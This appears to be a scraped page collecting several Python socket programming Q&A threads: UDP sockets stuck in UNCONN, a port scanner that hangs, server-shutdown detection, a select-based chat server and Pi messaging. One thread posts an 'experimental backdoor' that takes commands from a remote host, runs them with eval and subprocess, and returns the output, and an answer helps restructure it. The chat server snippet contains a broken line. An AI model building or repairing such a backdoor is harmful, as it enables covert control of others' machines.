I am facing an issue where my sockets in ubuntu are left in UNCONN State:
ss -s
And below are the state for better visibility
ss -au
I am using a python code that is trying to use sockets to receive audio streams and the basic function to create a socket looks like the below :
def find_incoming_port_multiplier(self, ip, alias,port=0, min_port=1000, max_port=11000):
if min_port > 0:
port = min_port + alias
while port <= max_port:
if port in Controller.port_info:
logger.info('port already present in port_info' + str(port))
port += 1000
continue
try:
listeningAddress = (ip, port)
logger.info("Looking for PORT " + str(listeningAddress))
datagramSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#End the socket in 30 seconds ... just a precaution
datagramSocket.settimeout(30)
datagramSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logger.info("Trying Binding... " + str(listeningAddress))
datagramSocket.bind(listeningAddress)
logger.info("Final Port Allocated " + str(listeningAddress))
return datagramSocket, datagramSocket.getsockname()[1]
except OSError:
logger.info('PORT ' + str(port) + ' already in use')
port += 1000
raise IOError('no free ports')
The socket object from the above function is used by a new thread and ends once the processing is done.
I am still not determined whether it's something to do with linux OR how the socket is created.
Killing the code forcefully all the sockets are released. Interestingly the same issue is not present if the OS is windows.
SO JUST TO EXPLAIN FURTHER AS REQUESTED:
The Function above shared an unconnected socket
The unconnected socket is set as a variable of a class, and thread is started to process it
The socket is finally closed at the end
try:
while (True):
self.pi.incoming_sock.settimeout(5)
try:
message, sourceAddress = self.pi.incoming_sock.recvfrom(self.incoming_packet_size)
except:
logger.info('Stream closed.. exiting loop')
break
self.stream.write(message)
except:
logger.exception(traceback.print_exc())
finally:
if self.pi is not None and self.pi.incoming_sock is not None:
self.pi.incoming_sock.shutdown(socket.SHUT_RDWR)
self.pi.incoming_sock.close()
I was earlier assuming that the threads are not dying but using the Htop command on Linux I can see that at any point the threads are no more than 200 but sockets reach around 52K and then the process hangs.
Related
I'm running a port scanner on my home network. If I run it against devices on my home network, it only works on other Linux machines (physical machines not VMs). By "works" I mean it finds what few ports are actually open (ssh, mysql, sunrpc, and a couple others).
When scanning Windows and other miscellaneous iot devices it just hangs and never finishes. I can't seem to figure out where it gets stuck.
I think this might be the most relevant part of the code:
for port in range(begin, end):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
status = s.connect_ex((self.target_ip, port))
except Exception:
continue
finally:
s.close()
if status != 0:
continue
try:
service = socket.getservbyport(port)
except Exception:
service = "unknown"
print("SERVICE: %-15s\tPORT: %-8d" % (service, port))
I modified your code so that I could simulate a run on my machine and it seems like it hangs because that very last print statement is not reached. But this is because your continue line within the if status != 0 always comes back as "not 0", at least on my Windows 10 Pro machine.
for port in range(begin, end):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
status = s.connect_ex((self.target_ip, port))
print("DEBUG: ", status) # add this
except Exception as err:
print("Error: ", err) # add this
continue
finally:
s.close()
if status != 0:
print("DEBUG: status was not 0") # add this
# if this line is reached, we start at the top of the loop
# skipping the try except and print below entirely.
continue
try:
service = socket.getservbyport(port)
except Exception:
service = "unknown"
print("SERVICE: %-15s\tPORT: %-8d" % (service, port))
Could you give this a shot and see if will shine some light on what might be wrong or let us know what kind of output you get. I was not able to currently run this on any Linux machine or IoT devices. I assume you are able to read the console output on each of your devices to have determined that it seemed like it was "hanging".
Edit 1: More context for the hanging issue
Let me give you some examples of what happens with this script on my network.
CASE 1: '192.168.1.0'
This address exists, but generally isn't used or assigned to anything. Hangs for about 20 seconds per port for me.
CASE 2: '192.168.1.1'
This is usually the router on the network. Responds immediately. Hangs for about 1 second per port that is scanned.
CASE 3: '192.168.1.3'
This device is in the network range, but no device is actively using it. Hangs for about 20 seconds per port (just like case 1).
So the long "hang" isn't that it is not working. It can basically mean the IP is wrong or there is no device being reached so the timeout limit is being reached for that socket connection attempt instead of raising an exception it just moves on.
Edit 2
Before iterating over a huge range of IP addresses and a wide range of ports per each IP address being tested. Sometimes it can be helpful to test assumptions 1 at a time by defining more control over a few ports and a specific IP address.
This is what I converted your code into to do that. If the conn is not 0 I am just considering that port closed no matter which error code came back for this case. We only care about the ones that respond with 0 because that indicates the operation succeeded.
import socket
# Lets test just a few custom ports.
ports = [21, 22, 80, 8080]
# And test a specific IP address to test, 1 at a time.
ip = '192.168.1.1' # change this if needed
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for port in ports:
# loop through our small custom port range.
try:
conn = sock.connect_ex((ip, port))
if conn == 0:
print("Port [{}] open.".format(port))
else:
print("Port [{}] closed.".format(port))
except Exception as err:
print(err)
continue
try:
service = socket.getservbyport(port)
except Exception:
service = "unknown"
print("SERVICE: %-15s\tPORT: %-8d" % (service, port))
sock.close()
I was making an experimental backdoor that needs to put into a variable the string that I will send to the port number 433. I try this, but it doesn't work. Here's the code:
import socket
import time
import subprocess
host = '' # <-- WRITE HERE THE HOST TO RECIVE INFO
port = '433'
s = socket.socket()
s.accept()
my_ip = socket.gethostbyname(socket.gethostname())
s.bind((host, port))
try:
s.connect()
except socket.error():
time.sleep(5)
s.connect()
s.send("\n[*] Status: Conected!")
s.listen(port)
while 1:
time.sleep(2)
s.send("\n[*] Status: Transmiting from " + str(my_ip) + "...")
s.send("\n[*] Status: Listening port " + str(port) + "...")
rmt_cmd = s.recv(1024)
if rmt_cmd != "":
eval(rmt_cmd)
s.send("\n[*] Status: Executing ( " + str(rmt_cmd) + " )...")
process = subprocess.Popen(rmt_cmd, shell=False,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
cmd_output = process.stdout.read() + process.stderr.read()
s.send("\n[*] Command output/error(s):")
s.send("\n[*] " + cmd_output)
else:
s.send("\n[*] No command recived")
s.send("\n[*] Status: Listening port " + str(port) + "...")
Here the code try to connect to the host, and if there is an error, it waits 5 second and try again, because the other computer has an program that initiate with the OS that accept the connections, so the backdoor wait 5 seconds because the computer may be turning on:
try:
s.connect()
except socket.error():
time.sleep(5)
s.connect()
but the problem is that I want to put into rmt_cmd (remote_command) the string that I will send to the port 433, and this give me another thing:
rmt_cmd = s.recv(1024)
How can I do it?
Although I understand what you're trying to do, the way you're trying to achieve this needs to be reworked.
s = socket.socket()
s.accept()
my_ip = socket.gethostbyname(socket.gethostname())
s.bind((host, port))
try:
s.connect()
except socket.error():
time.sleep(5)
s.connect()
s.send("\n[*] Status: Conected!")
s.listen(port)
You need to get understanding of what you actually want.
1) Do you want your backdoor to stay passive and wait for a connection? Then it should be like this:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.bind(address) # your host/port pair that client will need to connect to
sock.listen(5)
client_sock = sock.accept() # all the communications happen with
# client_sock since now
In this case it is also possible that your OS won't let you bind 433 port. Ports below 1024 are usually forbidden to use by third party apps to prevent conflicts and backdoors (ha-ha).
2) Do you want your backdoor to actively connect to the remote host? Just create socket and use its connect method. Don't mix bind+listen+accept (passive socket mode) with connect (active mode).
rmt_cmd = s.recv(1024) part is unreliable and needs to be refactored. The same thing with s.send usages. Use s.sendall instead or there's a change you won't send the whole message in one send.
This is the sample socket at server side (taken from some website):
import socket
import sys
HOST = '' # Symbolic name, meaning all available interfaces
PORT = 10001 # Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print 'Socket created'
#Bind socket to local host and port
try:
s.bind((HOST, PORT))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete'
#Start listening on socket
s.listen(10)
print 'Socket now listening'
#now keep talking with the client
while 1:
#wait to accept a connection - blocking call
conn, addr = s.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
conn.send("Test Messag")
s.close()
This is the code at client side:
import socket
s=socket.socket()
s.connect((ipaddress,port))
s.setblocking(1)
import time
counter = 0
while True:
print counter
chunk = s.recv(11,socket.MSG_WAITALL)
if not chunk:
raise Exception('Socket error')
print chunk
time.sleep(1)
counter += 1
The server side code runs on an amazon ec2 instance (based on the amazon linux ami)
When I terminate the instance I would expect that the recv method on the socket throws an error, but it does not. Whatever I do, it never throws an error. When I run the server side code in an ipython notebook and restart the kernel, the recv method unlocks and keeps returning empty strings (according to When does socket.recv() raise an exception? this should be in the case of a clean shutdown), but no error is thrown.
What could be the cause of this, I really need to have it throw an exception so I can notify the rest of my code that the server went down in order to start a new one.
When I terminate the instance I would expect that the recv method on the socket throws an error ...
When the server terminates it will do a clean shutdown of the socket, so you will get no exception on the client side. To get what you want you would have to implement some kind of shutdown message inside your application. Then you can distinguish a proper shutdown (with an explicit shutdown message) from just a socket close.
You are making only one tcp connection. You have to make multiple request.
import socket
import time
counter = 0
while True:
print counter
s=socket.socket()
try:
s.connect((ipaddress,port))
s.setblocking(1)
chunk = s.recv(11,socket.MSG_WAITALL)
except Exception as e:
print e
break
print chunk
time.sleep(1)
counter += 1
I don't want to make this post long so i get straight to the part i don't understand
this is the code i got from here
i aleady made my own app, but i made it the most awful way!
# Tcp Chat server
import socket, select
#Function to broadcast chat messages to all connected clients
def broadcast_data (sock, message):
#Do not send the message to master socket and the client who has send us the message
for socket in CONNECTION_LIST:
if socket != server_socket and socket != sock :
try :
socket.send(message)
except :
# broken socket connection may be, chat client pressed ctrl+c for example
socket.close()
CONNECTION_LIST.remove(socket)
if __name__ == "__main__":
# List to keep track of socket descriptors
CONNECTION_LIST = []
RECV_BUFFER = 4096 # Advisable to keep it as an exponent of 2
PORT = 5000
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this has no effect, why ?
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('', PORT))
6.listen(10)
# Add server socket to the list of readable connections
CONNECTION_LIST.append(server_socket)
print "Chat server started on port " + str(PORT)
while 1:
# Get the list sockets which are ready to be read through select
read_sockets,write_sockets,error_sockets = select.select(CONNECTION_LIST,[],[])
for sock in read_sockets:
#New connection
if sock == server_socket:
# Handle the case in which there is a new connection recieved through server_socket
sockfd, addr = server_socket.accept()
CONNECTION_LIST.append(sockfd)
print "Client (%s, %s) connected" % addr
broadcast_data(sockfd, "[%s:%s] entered room\n" % addr)
#Some incoming message from a client
else:
# Data recieved from client, process it
try:
#In Windows, sometimes when a TCP program closes abruptly,
# a "Connection reset by peer" exception will be thrown
data = sock.recv(RECV_BUFFER)
if data:
broadcast_data(sock, "\r" + '<' + str(sock.getpeername()) + '> ' + data)
except:
broadcast_data(sock, "Client (%s, %s) is offline" % addr)
print "Client (%s, %s) is offline" % addr
sock.close()
CONNECTION_LIST.remove(sock)
continue
server_socket.close()
i don't understand the part which uses select and adds a new connections, i guess every time an app tries to connect(myport,myip) a new descriptor is created and this method tries to get connect()ed people? can you explain me?
and i have no idea why the server socket is appended to the socket and why its passed to select! I already read this but i still don't understand
i also don't understand why if sock == server_socket: means there is a new connection, i think its because i still haven't understood select
Select() (like the select() function in C) is somewhat magic. It enables you to wait for a events, without occupying the computer's CPU.
The events, in your case, are the input and output operations of the socket. Imagine you're waiting before closed doors ('you' are the CPU). The (correct) door will open if something useful can be done. Each door leads to the an I/O operation which is added to the CONNECTION_LIST.
While waiting, the CPU doesn't spend time on your program. Whichever door opens first, will wake the CPU, and lets you process the data.
Note: In Linux, select() works on all file operations (such as, in this case sockets). In Windows, this only works on sockets.
Note2: Though sockets work fine, I rather prefer a callback mechanism, such as iowatch from the gio library (part of glib). These will call functions when an operation is necessary.
Recently, I managed to create sockets on my PC and my Raspberry Pi to enable communication between both devices. Currently, the client is able to automatically send messages to the server. I was wondering, if it is possible to modify the scripts to send tcp data packets instead of purely text messages, as I would very much like to control the raspberry pi using my PC in the future without having the need to ssh/etc.
I've looked at some examples, but as I don't have much experience in writing my own scripts/codes, I'm not very sure how to go about doing this. I would appreciate if someone could guide me in the right direction with explanation and some examples if possible.
Anyway here is the server/client script I'm running at the moment:
Client:
import socket
import sys
import struct
import time
#main function
if __name__ == "__main__":
if(len(sys.argv) < 2) :
print 'Usage : python client.py hostname'
sys.exit()
host = sys.argv[1]
port = 8888
#create an INET, STREAMing socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error:
print 'Failed to create socket'
sys.exit()
print 'Socket Created'
try:
remote_ip = socket.gethostbyname( host )
s.connect((host, port))
except socket.gaierror:
print 'Hostname could not be resolved. Exiting'
sys.exit()
print 'Socket Connected to ' + host + ' on ip ' + remote_ip
#Send some data to remote server
message = "Test"
try :
#Set the whole string
while True:
s.send(message)
print 'Message sent successfully'
time.sleep(1)
print 'Sending...'
except socket.error:
#Send failed
print 'Send failed'
sys.exit()
def recv_timeout(the_socket,timeout=2):
#make socket non blocking
the_socket.setblocking(0)
#total data partwise in an array
total_data=[];
data='';
#beginning time
begin=time.time()
while 1:
#if you got some data, then break after timeout
if total_data and time.time()-begin > timeout:
break
#if you got no data at all, wait a little longer, twice the timeout
elif time.time()-begin > timeout*2:
break
#recv something
try:
data = the_socket.recv(8192)
if data:
total_data.append(data)
#change the beginning time for measurement
begin=time.time()
else:
#sleep for sometime to indicate a gap
time.sleep(0.1)
except:
pass
#join all parts to make final string
return ''.join(total_data)
#get reply and print
print recv_timeout(s)
s.close()
Server:
import socket
import sys
from thread import *
HOST = '' # Symbolic name meaning all available interfaces
PORT = 8888
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
try:
s.bind((HOST, PORT))
except socket.error , msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete'
s.listen(10)
print 'Socket now listening'
#Function for handling connections
def clientthread(conn):
#Sending message to connected client
conn.send('Welcome to the server. Receving Data...\n') #send only takes string
#infinite loop so that function do not terminate and thread do not end.
while True:
#Receiving from client
data = conn.recv(1024)
reply = 'Message Received at the server!\n'
print data
if not data:
break
conn.sendall(reply)
conn.close()
#now keep talking with the client
while 1:
#wait to accept a connection
conn, addr = s.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
#start new thread
start_new_thread(clientthread ,(conn,))
s.close()
socket.socket(socket.AF_INET, socket.SOCK_STREAM) already creates a connection that provides a reliable stream of bytes between two machines. This uses TCP, which is on top of IP and Ethernet. The latter two are package-based, while TCP creates a stream of continuous bytes on top of it. It also adds some error checking and error correction, so it is pretty reliable.
I honestly don't understand what you want to achieve with what you call "send packets". What you don't want to do is to create an implementation of TCP yourself, as that's a non-trivial task, so sending RAW packets is out. In general, even using TCP is already relatively low-level and should be avoided unless really necessary.
Using e.g. ZeroMQ you get a message-based interface that does all the transmission for you. It does so on top of TCP (or other transports) and adds more error correction for e.g. disconnects. There, you also have something like "packets", but those are independent of how many TCP or IP packets were required to send it underneath. If you don't want to implement a specific protocol, I'd suggest you use this framework instead of lowlevel TCP sockets.
Another simple alternative is to use HTTP, for which there is also existing code in Python. The downside is that it is always one side that initiates some communication and the other side only replies. If you want some kind of active notification, you either have to poll or use hacks like delaying an answer.
You are already sending data packets - those packets juts happen to contain text data at the moment. Try looking into pickle in the standard libraries and into pyro.